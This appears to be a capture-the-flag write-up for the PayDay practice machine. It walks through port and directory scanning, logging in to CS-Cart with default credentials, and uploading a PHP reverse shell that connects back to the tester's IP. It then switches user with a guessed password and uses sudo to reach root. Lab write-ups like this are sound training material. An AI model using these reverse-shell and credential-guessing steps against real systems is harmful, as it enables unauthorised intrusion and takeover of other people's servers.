PayDay

Enumeration:

Port Scanning:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.222.39
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-02 20:34 +03
Nmap scan report for 192.168.222.39                                                                                                                       21:28:55 [188/523]
Host is up, received echo-reply ttl 61 (0.14s latency).                                                                                                                     
Scanned at 2025-10-02 20:34:45 +03 for 205s                                                                                                                                 
Not shown: 65527 closed tcp ports (reset)                                                                                                                                   
PORT    STATE SERVICE     REASON         VERSION                                                                                                                            
22/tcp  open  ssh         syn-ack ttl 61 OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)                                                                                        
| ssh-hostkey:                                                                        
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)                                                                                                              
| ssh-dss AAAAB3NzaC1kc3MAAACBAJedhI7AqO17xYjoo1RT33T4x4g7b+u71OK2CNJW//eoNBEibTyvqAmBDobETDcAZXHMdEMTvINlM7ZjGV4EAhfE57Fkkhae8LvML3Ae0OVsa/l4pWizwGEEkHVujayyHZlwqXnK1ePV9r
Knc6VJUYL4yHPMEwhNDme92hxlEWBbAAAAFQCyn5tJyWy2EZXJLQgS/xpiBH36uQAAAIBcUdaW5kLYjbgbalp1Z3cMQuuiG/YhaLxNBMh75vM/SrrsATeqEIUlBNBgDel+fUSPbr2iCQ+I8xrk6CNvcXtugMfJSF78pH42VN5GrL
KzNZeoyGzywEhcFKHAqcRMntyEZJ/BiLWRunRcnKznMMa00/d3xRLvTFKUmUjdW1IebAAAAIBRhyvDlRI873HIhNd8GiXY/kZyL+jDQle8ULF1Lk+H+EzKXMSPt0gMv8z2bpSD1XIB565rcFWlO+7q0BZFY+NLJAhMWAWxBE4Ib8
7uPUqeGvg6D8w6gZur84lpMg7P1KjyihIfY5tMCwfKkkaS418IPzhKtDUvtI0Vr6h3Wv0luA==                                                                                                  
|   2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)                                                                                                              
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzGacK6NGRpMIVjkA/xYbfKDgeJeQzkJl25og4nQl+FV4ZbvXv6h0vCU+E8SPHKPL/WJAIqmL6hdQaTQiTDmhcKjecWBq9fX1Esb8cvlOPEzphl+wESfJx/lWYvLPBXz0ZdKfy2
/O+0an9ua6jl3tDEFzeosHwIF8zDbaBL6/RzBV+0gkzA67OowtcaxoioYYPzsEaOAkAFjlaRMviUA3nzCvffG61KyqmAdwodl+rXyI4KHjQqinPYk5qmj9rO8LcLE/gWVRoRw4va6hbJ2V7e74Tt1HQ4V/FzhG1zrWdkI/qA65RM
Cw/0270w1PjYkfYl2ENJL6YHHosf4NCkfdbw==                                                                                                                                      
80/tcp  open  http        syn-ack ttl 61 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)                                                                                   
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6                                                                                                              
|_http-title: CS-Cart. Powerful PHP shopping cart software                                                                                                                  
| http-methods:                                                                                                                                                             
|_  Supported Methods: GET HEAD POST OPTIONS                                                                                                                                
110/tcp open  pop3        syn-ack ttl 61 Dovecot pop3d                                                                                                                      
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.                                                                                                               
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs 
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_pop3-capabilities: RESP-CODES STLS TOP UIDL PIPELINING CAPA SASL
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
139/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        syn-ack ttl 61 Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs 
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
|_imap-capabilities: completed THREAD=REFERENCES IDLE LITERAL+ OK IMAP4rev1 STARTTLS Capability LOGINDISABLEDA0001 UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPE
ND CHILDREN
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp open  netbios-ssn syn-ack ttl 61 Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    syn-ack ttl 61 Dovecot imapd
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_imap-capabilities: THREAD=REFERENCES IDLE LITERAL+ AUTH=PLAINA0001 IMAP4rev1 completed Capability OK UNSELECT NAMESPACE LOGIN-REFERRALS SORT SASL-IR MULTIAPPEND CHILDREN
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs 
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
<snipped>
|_-----END CERTIFICATE-----
995/tcp open  ssl/pop3    syn-ack ttl 61 Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: RESP-CODES TOP UIDL USER PIPELINING CAPA SASL(PLAIN)
|_ssl-date: 2025-10-02T17:36:00+00:00; +9s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName
=Everywhere/organizationalUnitName=Office for Complication of Otherwise Simple Affairs 
| Issuer: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX/emailAddress=root@ubuntu01/localityName=Everywhere
/organizationalUnitName=Office for Complication of Otherwise Simple Affairs
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2008-04-25T02:02:48
| Not valid after:  2008-05-25T02:02:48
| MD5:   90db:2a9a:2d86:29dc:f047:d19d:c636:9c8e
| SHA-1: 1bde:08b6:86fc:9892:33c9:7bd4:0125:c572:5b32:d829
| -----BEGIN CERTIFICATE-----
| MIIDEzCCAnwCCQCZRVLhl4lWWjANBgkqhkiG9w0BAQUFADCBzTELMAkGA1UEBhMC
|_-----END CERTIFICATE-----
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP (80):

I will start with port 80 by running gobuster:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ gobuster dir -u http://192.168.222.39/ -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.222.39/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
<snipped>
/addons               (Status: 301) [Size: 335] [--> http://192.168.222.39/addons/]
/admin.php            (Status: 200) [Size: 9483]
/admin.php            (Status: 200) [Size: 9483]
/admin                (Status: 200) [Size: 9483]
/catalog              (Status: 301) [Size: 336] [--> http://192.168.222.39/catalog/]
/cgi-bin/.html        (Status: 403) [Size: 313]
/cgi-bin/             (Status: 403) [Size: 308]
/chart                (Status: 200) [Size: 0]
/chart.php            (Status: 200) [Size: 0]
/classes              (Status: 301) [Size: 336] [--> http://192.168.222.39/classes/]
/config.php           (Status: 200) [Size: 13]
/config               (Status: 200) [Size: 13]
<snipped>
/index                (Status: 200) [Size: 28074]
/index.php            (Status: 200) [Size: 28074]
/index.php            (Status: 200) [Size: 28074]
<snipped>
/install              (Status: 200) [Size: 7731]
/install.php          (Status: 200) [Size: 7731]
<snipped>
/skins                (Status: 301) [Size: 334] [--> http://192.168.222.39/skins/]
<snipped>
Progress: 18452 / 18452 (100.00%)
===============================================================
Finished
===============================================================

We will find some appealing files and directories.

Explore the website:

We will see it is running cs-cart template.

Skins directory has directory listing, also misconfigured to show the underlying operating system and the webserver running it:

We can find the exact version of that application if we naviagted to install.php:

Or by checking the last update to the copyright:

Exploitation:

One of the vulnerabilities this version is vulnerable to is authentcated RCE, lets check it out:

CS-Cart 1.3.3 - authenticated RCEExploit Database

As stated in one of the github comments:

Visit "cs-cart" /admin.php and login (Remember: You need to login on ADMIN section not on the regular USER section).
Under Look and Feel section click on "template editor".
And under that section, upload your malicious .php file, make sure you rename it to .phtml before you upload.
If successful, you should be able to get a RCE.

We can try some combinations of default passwords, such as admin:admin, etc. Or we can search online for the default credentials for cs-cart.

admin:admin worked for me:

Then we will click on template editor under look and feel:

We will upload php reverse shell, but first edit it to add my own IP address and the port, and change its extension to phtml as mentioned in the github comment:

┌──(kali㉿kali)-[/usr/share/webshells/php]
└─$ cp php-reverse-shell.php ~/Desktop/CTF/Machines/OffsecPG/Practice/Payday/shell.phtml

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ cat shell.phtml
<?php     

set_time_limit (0);                       
$VERSION = "1.0";
$ip = '192.168.45.177';  // CHANGE THIS
$port = 443;       // CHANGE THIS          
$chunk_size = 1400;                       
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';   
$daemon = 0;
$debug = 0;

Browse the files by pressing the browse button, and the select the file, and click on upload:

Is we can see it is uploaded under /skins/ directory that we discovered before with the use of gobuster.

Before opening it, we will start a netcat listener:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...

Click on shell.phtml:

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.222.39] 42047
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 13:57:04 up 25 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'        
www-data@payday:/$ export TERM=xterm
export TERM=xterm
www-data@payday:/$ ^Z
zsh: suspended  nc -nlvp 443

┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Payday]
└─$ stty raw -echo ; fg       
[1]  + continued  nc -nlvp 443

www-data@payday:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@payday:/$ stty rows 43 cols 172

Lateral Movement to patrick:

After doing some local enumeration, we will find there is a user called patrick on the machine:

www-data@payday:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
<snipped>
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bas
www-data@payday:~# ls -la /home
total 12
drwxr-xr-x  3 root    root    4096 2016-04-12 07:33 .
drwxr-xr-x 21 root    root    4096 2008-04-24 22:02 ..
drwxr-xr-x  2 patrick patrick 4096 2020-03-25 10:25 patrick

I will try the password as the username:

www-data@payday:/$ su patrick
Password: patrick
patrick@payday:/$

We are patrick.

Or we can brute force the password using different tools such as, hydra, medusa, ncrack, etc.

Privilege Escalation:

Lets check if patrick can run any command with sudo:

patrick@payday:/$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick: patrick
User patrick may run the following commands on this host:
    (ALL) ALL

So we can run all commands as sudo, which will help us su to root:

patrick@payday:/$ sudo su
root@payday:/#

Get the flags:

root@payday:~# cat proof.txt
4df293678a81880268b8796be4bc2b20
root@payday:~# cat /home/patrick/local.txt
6e520701348836197df61cbafd055feb

PreviousPelican NextSnookums

Last updated 4 months ago

hashtagEnumeration:

hashtagPort Scanning:

hashtagHTTP (80):

hashtagExploitation:

hashtagLateral Movement to patrick:

hashtagPrivilege Escalation: